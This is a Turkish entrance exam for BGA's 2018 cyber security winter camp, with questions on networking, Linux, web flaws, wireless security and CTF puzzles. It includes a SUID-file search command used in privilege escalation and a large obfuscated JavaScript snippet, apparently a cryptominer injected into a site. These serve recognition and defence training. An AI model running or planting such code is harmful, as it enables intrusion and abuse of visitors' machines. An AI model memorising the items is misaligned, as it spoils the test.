2. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Giriş
BGA Bilgi Güvenliği AKADEMİSİ, “Siber Güvenlik” konusunda kariyer yapmak ve bu konuda
uzmanlaşmak isteyen üniversite öğrencilerini, Siber Güvenlik Kamp’larına davet ediyor.
Ülkemizde Siber Güvenlik ile ilgili nitelikli eleman yetiştirme potansiyeli sadece %1
seviyesindedir. Bu alandaki insan kaynağı eksikliğini gidermek ve ülkemizin Ulusal Siber
Güvenlik vizyonunu tamamlanmasına destek olmak amacı ile Bilgi Güvenliği AKADEMİSİ
tarafından Siber Güvenlik Kamp’ları düzenlenmektedir.
Siber güvenlik alanında teknik çalışmalar yürüten, üretmeyi ve projeler geliştirmeyi hedefleyen
Bilgi Güvenliği AKADEMİSİ, sosyal sorumluluk projesi olarak gerçekleştirdiği Siber Güvenlik
Kamp’ları ile bu alanda uzman yetiştirmeyi ve sektör katkı sağlamayı amaçlamaktadır.
Bu alandaki insan gücü ihtiyacını karşılamak ve sektöre deneyimli, uzman personeller
yetiştirmek amacı ile gerçekleştirilen Siber Güvenlik Kamplar’ına katılmaya hak kazanan
öğrencilerin tüm masrafları, Bilgi Güvenliği AKADEMİSİ ve sponsor firmalar tarafından
karşılanacaktır.
Siber Güvenlik Kampı’na katılacak olan öğrenciler, Bilgi Güvenliği AKADEMİSİ’nin tecrübeli
eğitmenleri ve sektörün önde gelen Siber Güvenlik Uzmanları’ndan 7 gün süreyle özel eğitim
alma fırsatı yakalayacaklardır.
Hacking, zafiyet tarama, zararlı yazılım analizi, mobil güvenlik, DDOS saldırılarına karşı doğru
savunma gibi birçok konuda eğitim alacak olan Siber Güvenlik Kampı öğrencileri, eğitici ve
öğretici CTF yarışmaları sayesinde takım çalışması yeteneklerini de arttıracak ve öğrenmiş
oldukları bilgileri pekiştirebileceklerdir.
Siber Güvenlik Kış Kampı’na katılıma hak kazanan öğrenciler, bilgi güvenliği alanında deneyim
sahibi akademisyenler, kamu ve özel sektör yöneticileri ile de bir araya gelerek bu alanındaki
kariyer fırsatları konusunda da bilgi sahibi olacaklar.
“Gerçekleştirmiş olduğumuz Siber Güvenlik Kamp’larına bugüne kadar 20.000’den fazla
başvuru yapıldı. Bu başvurularda ise 250’den fazla öğrenci Siber Güvenlik uzmanlarımız
tarafından yetiştirildi ve sektöre kazandırıldı”
Siber Güvenlik Kış Kampı’na üniversitelerin Ön Lisans, Lisans, Yüksek Lisans veya Doktora
programlarında öğrenimleri devam eden kişiler kabul edilecektir.
Kampa katılmaya hak kazanan öğrencilerin konaklama, yeme, içme, eğitim ve diğer giderleri
Bilgi Güvenliği AKADEMİSİ ve sponsor firmalar tarafından karşılanacaktır.
Kamp, başvurular ve sorularınız ile ilgili daha fazla bilgi almakiçin SiberKamp.org adresini
ziyaret edebilir, eğitmen ve destekleyen firmalar hakkında bilgi edinebilirsiniz.
3. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORULAR
SORU 1: Bir web sayfasının içeriği saldırganlar tarafından değiştirildiğinde aşağıdaki "bilgi
güvenliği" kriterinden hangisi zarar görmüş olur?
A) Gizlilik
B) Bütünlük
C) Kullanılabilirlik
D) İnkâr Edilemezlik
E) Hiçbiri
SORU 2: Analiz için almış olduğumuz bir ağ trafiği dosyası incelenirken içerisinde
NTFiM3JfNnV2RW5sMWtfazE1X2s0bVAxXzIwMTg= şeklinde bir bilgi tespit edilmiştir. Bu
veri ne anlama gelmektedir?
CEVAP: …………………………..
SORU 3: Saldırgan, kurban olarak belirlediği bir kişiye özel mesaj üzerinden
http://k.url/s6k4mP1 şeklinde kısaltılmış bir link göndermektedir. Kurban bu linki açtığında
karşısına bir pop-up mesajı çıkmaktadır. Bu noktada saldırgan aşağıdaki yöntemlerden
hangisini veya hangilerini kullandığı söylenebilir?
A) SQL Injection
B) ARP Poisining
C) ICMP Redirect
D) Stored XSS
E) Insecure Direct Object Reference(IDOR)
F) ICMP Redirect
G) Brute Force
H) HTTP Flood
I) Dom tabanlı XSS
J) Reflected XSS
SORU 4: TCP RST bayrağı ne işe yarar?
A) Bağlantı başlatmak için kullanılır.
B) Bağlantı sonrası oturum doğrulamak için kullanılır.
C) Bağlantıyı tamamen sonlandırmak için kullanılır.
D) Bağlantıdaki paketin öncelikli olduğunu belirtmek için kullanılır.
E) TCP’nin üçlü el sıkışmasını başarıyla tamamlamak için kullanılır.
4. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 5: ICMP, OSI modeline göre hangi katmanda çalışır?
A) 4
B) 3-2
C) 3
D) 5
E) 2
SORU 6: Aşağıdaki servislerden hangileri TCP kullanır?
1. DHCP
2. SMTP
3. HTTP
4. TFTP
5. FTP
A) 1 ve 2
B) 2, 3 ve 5
C) 1, 2 ve 4
D) 1, 3 ve 5
E) 3 ve 5
SORU 7: OSI modelinin transport katmanı TCP/IP modelinde hangi katmana karşılık
gelmektedir?
A) Application
B) Host-to-Host
C) Internet
D) Network Access
E) Data Link
SORU 8: 2048 tane cihazın (kullanıcının) bulunduğu bir ağ yapınız mevcut. IP yapılandırmaları
ile ilgili olarak IP adresini, alt ağ maskesini, varsayılan gateway’i ve DNS sunucusuna ait
bilgileri otomatik olarak dağıtmanız isteniyor. Bunu gerçekleştirmek için aşağıdaki
protokollerden hangisini veya hangilerini kullanırsınız?
A) SMTP
B) SNMP
C) ARP
D) RARP
E) DHCP
5. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 9: Linux tabanlı bir sistem üzerinde aşağıdaki gibi bir durum mevcuttur.
-r-------- 1 root root 56112 May 2 2017 /bin/chmod
---------- 1 user user 92189 Jan 17 2017 /home/user/questions.txt
Yukarıdaki duruma göre questions.txt dosyasının içini okumak isteyen root kullanıcısı
aşağıdakilerden hangisini yapabilir?
A) vi ya da nano kullanarak dosyayı açmalı.
B) questions.txt dosyasına okuma izni vererek dosyayı açmalı.
C) Dosya user kullanıcısına ait olduğundan root bunu okuyamaz.
D) chmod'u yeniden yükleyip, dosyaya okuma izni vererek okumalı.
E) questions.txt dosyası artık okunamaz olduğundan çöp dosya olmuştur.
SORU 10: Saldırgan bir Linux sunucuya saldırı gerçekleştirmiştir. Analiz esnasında çalıştırılan
komutlar arasında yukarıdaki gibi bir komut tespit edilmiştir. Bu komut ile saldırgan ne
yapmak istiyor olabilir?
find / ( -perm -u+s -or -perm -g+s ) -type f -exec ls -l {} ;
A) Kernel versiyonuna ait zafiyetleri bulmak.
B) Shell oluşturmak için yazma izni olan dizinleri bulmak.
C) root grubuna dahil kullanıcıları bulmak.
D) root izinlerinin mevcut olduğu dizinleri bulmak
E) root izinlerini kullanabileceği komutları bulmak
6. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 11: Log analizi gerçekleştirirken bir web sunucusunda aşağıdaki kayıtlara rastlanmıştır.
Buna göre aşağıdakilerden hangisi ya da hangileri doğrudur?
A) Brute force saldırı yapılmıştır.
B) Saldırı başarılı olarak sonuçlanmıştır.
C) Saldırı başarısız olmuştur.
D) Saldırıyı gerçekleştiren sistem gatewaydir.
E) Saldırı veritabanına yapılmıştır.
F) Saldırı web sunucusunun 16020 portuna yapılmıştır.
G) Bu saldırı kullanıcıların sunucu üzerindeki web sitesini ziyaret etmesini
engellemektedir.
SORU 12: Bir Linux sistem üzerinde aşağıdaki komutları çalıştıran kişi ne yapmayı amaçlar?
iptables -A INPUT -p icmp -m icmp --icmp-type address-mask-request -j DROP
iptables -A INPUT -p icmp -m icmp --icmp-type timestamp-request -j DROP
iptables -A INPUT -p icmp -m icmp -m limit --limit 1/second -j ACCEPT
A) ICMP paketlerine cevap verilmesini engelliyordur.
B) SYN flood saldırısını engelliyordur.
C) Peer-to-Peer Attack’ı engelliyordur.
D) Smurf Attack’ı engelliyordur.
E) Slowloris saldırısını engelliyordur.
SORU 13: Bir Linux sistem üzerinde aşağıdaki komutu çalıştıran kişi ne yapmayı amaçlar?
ssh 192.168.7.13 "sudo /usr/sbin/tcpdump -s0 -w - 'port 80'" | wireshark -k -i -
CEVAP: …………………..
7. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 14: Windows sistemlerde DNS çözümleme sırası nasıl gerçekleşmektedir?
i) Wins
ii) DNS Cache
iii) LmHosts Dosyası
iv) NetBIOS Name Cache
v) Hosts Dosyası
vi) Broadcast
vii) DNS
A) iv-ii-v-vii-vi-i-iii
B) ii-v-vii-iv-i-vi-iii
C) v-vii-iii-ii-vi-i-iv
D) vii-v-ii-iii-i-vi-iv
E) iii-ii-v-vii-vi-i-iv
SORU 15: Aşağıdakilerden hangisi ya da hangileri DHCP Discover mesajını tanımlar?
1. 2. Katman yayını olarak FF:FF:FF:FF:FF:FF kullanılması
2. UDP protokolü kullanılması
3. TCP protokolü kullanılması
4. 2. katman yayını olarak adres kullanmaması
A) Yalnız 1
B) Yalnız 2
C) 1 ve 2
D) 3 ve 4
E) Yalnız 4
8. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 16: Bir saldırgan sonradan dahil olduğu bir kafenin ağında gözüne bir kurban
kestirmiştir. Kurbana bir saldırı düzenleyerek yukarıdaki grafikte gösterilen sonucu elde
etmiştir. Buna göre saldırgan aşağıdaki saldırılardan hangisini gerçekleştirmiş olabilir?
A) ARP Poisining
B) SQL Injection
C) Error Based XSS
D) ARP Spoofing
E) ICMP Redirect
F) DHCP Mangling
G) Smurf Saldırısı
H) IP Spoofing
I) SYN Flood
J) DHCP Session Clicking
K) IP Redirect
SORU 17: ICMP paketleri ile ilgili olarak aşağıdakilerden hangisi ya da hangileri doğrudur?
1. Bir TCP segmentinin alındığını onaylarlar.
2. Bir datagram alındığını onaylarlar.
3. Cihazlara ağ sorunları hakkında bilgi sağlarlar.
4. IP datagramları içerisinde kapsüllenirler.
A) Yalnız 1
B) Yalnız 3
C) 1 ve 2
D) 3 ve 4
E) Hepsi
9. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 18: Aşağıdakilerden hangisi bir router’ın bir uzak bilgisayara yönelik ARP isteğine yanıt
vermesini sağlar?
A) Gateway DP
B) Reverse ARP (RARP)
C) Proxy ARP
D) Inverse ARP (IARP)
E) Hiçbiri
SORU 19: KRACK zafiyeti ile ilgili olarak aşağıdaki ifadelerden hangisi ya da hangileri
doğrudur?
A) Kablosuz ağın parolasını bulmak için kullanılır.
B) WPA-TKIP kullanılarak saldırı önlenebilir.
C) AES-CCMP kullanmak saldırıyı önlemez.
D) WPA1 bu saldırıdan etkilenir; ancak WPA2 etkilenmez.
E) Saldırıyı hafifletmek için 802.11r özelliği devre dışı bırakılabilir.
F) Kablosuz ağ cihazının WPS özelliğini kapatmak saldırıyı önleyebilir.
G) Bu saldırı kablosuz ağın PSK bilgilerini bilmeden ağ trafiğini görüntülemeyi sağlar.
SORU 20: Aşağıdakilerden hangisi en güçlü kablosuz sinyal şifrelemesi sunar?
A) WAP
B) WEP
C) WPA
D) WINS
E) WIN
SORU 21: WPA2 için güvenlik standardı aşağıdakilerden hangisidir?
A) 802.11ad
B) 802.11i
C) 802.11n
D) 802.11a
E) 802.11b
10. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 22: Aşağıdaki kodun barındırdığı zafiyet nedir?
A) SQL Injection
B) Dom based XSS
C) Stored XSS
D) File Inclusion
E) Command Injection
SORU 23: Aşağıdaki kodun barındırdığı zafiyet nedir?
A) CSRF (Cross-Site Request Forgery)
B) SQL Injection
C) Command Injection
D) Reflected XSS
E) IDOR (Insecure Direct Object Reference)
11. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 24: Aşağıdaki kod parçacığını inceleyen bir siber güvenlik uzmanı aynı zamanda web
loglarını da incelediğinde bol miktarda…
GET /index.php?file=index.php HTTP/1.0
GET /index.php?file=index.php HTTP/1.0
GET /index.php?file=index.php HTTP/1.0
…loglarını görmektedir. Bu saldırıya ne ad verilmektedir?
A) SQL injection
B) Cross-Site Request Forgery
C) Reflected XSS
D) Denial of Service
E) Directory Traversal
12. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 25: Web sitesi oldukça fazla ziyaret edilen bir blogger, web sitesinin kaynak kodunu
incelediğinde aşağıdaki kodun bulunduğunu fark etmiştir. Bu kod ne ifade eder?
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]
+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,
$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$
$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.
$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+""
+$.__$+$.$$_+$.$$_+$.$_$_+""+$.__$+$.$$_+$._$_+""+$.$__+$.___+""+$.__$+$.$_$+
$.$_$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$._$_+"
"+$.$__+$.___+"="+$.$__+$.___+""+$.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$.
$$$+""+$.$__+$.___+""+$.__$+$.___+$._$$+$._$+""+$.__$+$.$_$+$.__$+""+$.__$+
$.$_$+$.$$_+""+$.__$+$.__$+$.___+""+$.__$+$.$_$+$.__$+""+$.__$+$.$$_+$.$$_+$.
$$$_+"."+$.__$+$.___+$.__$+""+$.__$+$.$_$+$.$$_+$._$+""+$.__$+$.$_$+$.$$_+""
+$.__$+$.$$$+$.__$+""+$.__$+$.$_$+$.$_$+$._$+$._+""+$.__$+$.$$_+$._$$+"('"+$._
_$+$.$_$+$._$$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$__+$.$$$
+"_"+$._$+$.$$$$+"_"+$.__+""+$.__$+$.$_$+$.___+$.$$$_+"_"+$.__$+$.$_$+$.$_$+"
"+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$._$_+""+$.__$
+$.$$_+$._$$+"',"+$.$__+$.___+"{"+$.__$+$.$_$+$.$_$+""+$.__$+$.$_$+$.__$+""+$
.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$._$_+"."+$.__$+$.$$_+$._$$+$.__+$.$_$_+
""+$.__$+$.$$_+$._$_+$.__+"();}"+""")())();
A) Başka bir siteye ddos saldırısı yapmak istemektedir.
B) Siteye giren kullanıcılara zararlı yazılım indirterek botnet ağı kurmaktadır.
C) Siteye giren kullanıcıların işlem gücünü kullanarak mining(madencilik) yapmaktadır.
D) Siteye giren kullanıcıların kimlik bilgilerini çalmaktadır.
E) Siteyi başka bir adrese yönlendirmektedir.
SORU 26: Bir sisteme sızan iki saldırgan arasındaki konuşmalarda aşağıdaki gibi şifreli bir
mesaj geçmektedir. Bu mesajın ne anlama geldiğini açıklayınız.
77774442233777552672288777733663323266232
CEVAP: …………………………..
13. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 27: Bir bankanın saldırı almasından sonra yetkililer kredi kartı bilgilerinin sızdırılmış
olabileceğinden şüpheleniyor. Gerçekleştirilen analiz işlemlerinden sonra çok sayıda wav
dosyasının sızdırıldığını tespit ettik. Sizce bu ses kaydı ne anlama gelmektedir?
[sample.wav]
İndir; https://files.fm/u/7utccbbt
CEVAP: …………………………………..
SORU 28: Aşağıdaki lokasyona gitmek için gizli bir bayrak ekledik. Bayrağı bulabilir misiniz?
CEVAP: ………………………………
SORU 29: Aşağıdaki uygulamayı çalıştırdık ancak bayrağı bulamıyoruz. Bulabilir misin?
[Sample.elf]
İndir; https://files.fm/u/4ybbhh77
CEVAP: ……………………………
14. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 30: Ağ alt yapısında DMZ nereye kurulmalıdır?
A) İç ağ ile güvenlik duvarı arasına
B) İç ağa; ancak doğrudan güvenlik duvarına bağlı değil
C) Dış ağ ve güvenlik duvarı arasına
D) Güvenlik duvarının arkasında; ancak iç ağa doğrudan bağlı olmadan
E) Güvenlik duvarının önüne; ancak doğrudan iç ağa bağlı olarak
SORU 31: Saldırı tespit sisteminin iki türü nedir?
A) Anomaly and signature
B) Passive and active
C) Internal and external
D) Host and network
E) Dynamic and directly
SORU 32: Saldırı önleme sisteminin iki türü nedir?
A) Anomaly and signature
B) Passive and active
C) Internal and external
D) Host and network
E) Dynamic and directly
SORU 33: Aşağıdakilerden hangisi asimetrik anahtar şifrelemesi kullanmaktadır?
A) AES
B) PGP
C) 3DES
D) RC5
E) DES
SORU 34: OSI modelinin ağ katmanında çalışan güvenlik duvarlarının iki türü aşağıdakilerden
hangisidir?
A) Stateful and stateless
B) Dynamic and static
C) Anomaly and signature
D) Mandatory and discretionary
E) Passive and active
15. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 35: Değerli bilgiler taşıyan bir sistem izole edilmiş bir ağ içerisinde sürekli olarak
izlenecek şekilde konumlandırılmıştır. Bu ne amaçla yapılan bir güvenlik tedbiridir?
A) Pseudo-network
B) Honeypot
C) Virtual Network
D) Canary Trap
E) VPN
SORU 36: Rol tabanlı erişim denetim listelerinin iki türü aşağıdakilerden hangisidir?
A) Mandatory and discretionary
B) Object and permission
C) Filesystem and networking
D) Dynamic and static
E) Passive and active
SORU 37: Aşağıdakilerden hangisi Pseudo/Virtual dosya sistemleri arasında yer almaz?
A) Devfs
B) Debugfs
C) Tmpfs
D) Ext3
E) Winfs
SORU: 38: Hangisi bir zararlıyı diske yazıldığı anda tespit edebilen bir AV yeteneğidir.
A) In-Memory Scan
B) On-Demand
C) On-Access
D) Heuristic Engine
E) Static Analysis
SORU 39: Hangisi, Zararlıların istismar aşamasına geçtiklerinde kullandıkları ve yıkıcı etkiye
sahip varlıklarına verilen addır.
A) Shellcode
B) Payload
C) Pseudo-Code
D) Opcode
E) Hexcode
16. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 40: Hangisi bir güvenlik çözümüne yakalanmadan, exploitin/zararlının hedefine
ulaşmasına yol açan tekniklere verilen isimdir.
A) Bypass
B) Injection
C) Massive Attack
D) Blinding
E) Evasion
SINAV SÜRESİ: 3 Saat
Sınavımız tamamlandı. Detaylı bilgi için siberkamp@bga.com.tr adresimiz ile iletişime
geçebilirsiniz.
17. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
BGA Bilgi Güvenliği A.Ş. Hakkında
BGA Bilgi Güvenliği A.Ş. 2008 yılından bu yana siber güvenlik alanında faaliyet göstermektedir.
Ülkemizdeki bilgi güvenliği sektörüne profesyonel anlamda destek olmak amacı ile kurulan BGA Bilgi
Güvenliği, stratejik siber güvenlik danışmanlığı ve güvenlik eğitimleri konularında kurumlara hizmet
vermektedir.
Uluslararası geçerliliğe sahip sertifikalı 50 kişilik teknik ekibi ile, faaliyetlerini Ankara ve İstanbul ve
USA’da sürdüren BGA Bilgi Güvenliği’nin ilgi alanlarını “Sızma Testleri, Güvenlik Denetimi, SOME, SOC
Danışmanlığı, Açık Kaynak Siber Güvenlik Çözümleri, Büyük Veri Güvenlik Analizi ve Yeni Nesil Güvenlik
Çözümleri” oluşturmaktadır.
Gerçekleştirdiği başarılı danışmanlık projeleri ve eğitimlerle sektörde saygın bir yer edinen BGA Bilgi
Güvenliği, kurulduğu günden bugüne alanında lider finans, enerji, telekom ve kamu kuruluşlarına
1.000'den fazla eğitim ve danışmanlık projeleri gerçekleştirmiştir.
BGA Bilgi Güvenliği, kurulduğu 2008 yılından beri ülkemizde bilgi güvenliği konusundaki bilgi ve
paylaşımların artması amacı ile güvenlik e-posta listeleri oluşturulması, seminerler, güvenlik etkinlikleri
düzenlenmesi, üniversite öğrencilerine kariyer ve bilgi sağlamak için siber güvenlik kampları
düzenlenmesi ve sosyal sorumluluk projeleri gibi birçok konuda gönüllü faaliyetlerde bulunmuştur.
BGA Bilgi Güvenliği AKADEMİSİ Hakkında
BGA Bilgi Güvenliği A.Ş.’nin eğitim ve sosyal sorumluluk markası olarak çalışan Bilgi Güvenliği
AKADEMİSİ, siber güvenlik konusunda ticari, gönüllü eğitimlerin düzenlenmesi ve siber güvenlik
farkındalığını arttırıcı gönüllü faaliyetleri yürütülmesinden sorumludur. Bilgi Güvenliği AKADEMİSİ
markasıyla bugüne kadar “Siber Güvenlik Kampları”, “Siber Güvenlik Staj Okulu”, “Siber Güvenlik Ar-
Ge Destek Bursu”, “Ethical Hacking yarışmaları” ve “Siber Güvenlik Kütüphanesi” gibi birçok gönüllü
faaliyetin destekleyici olmuştur.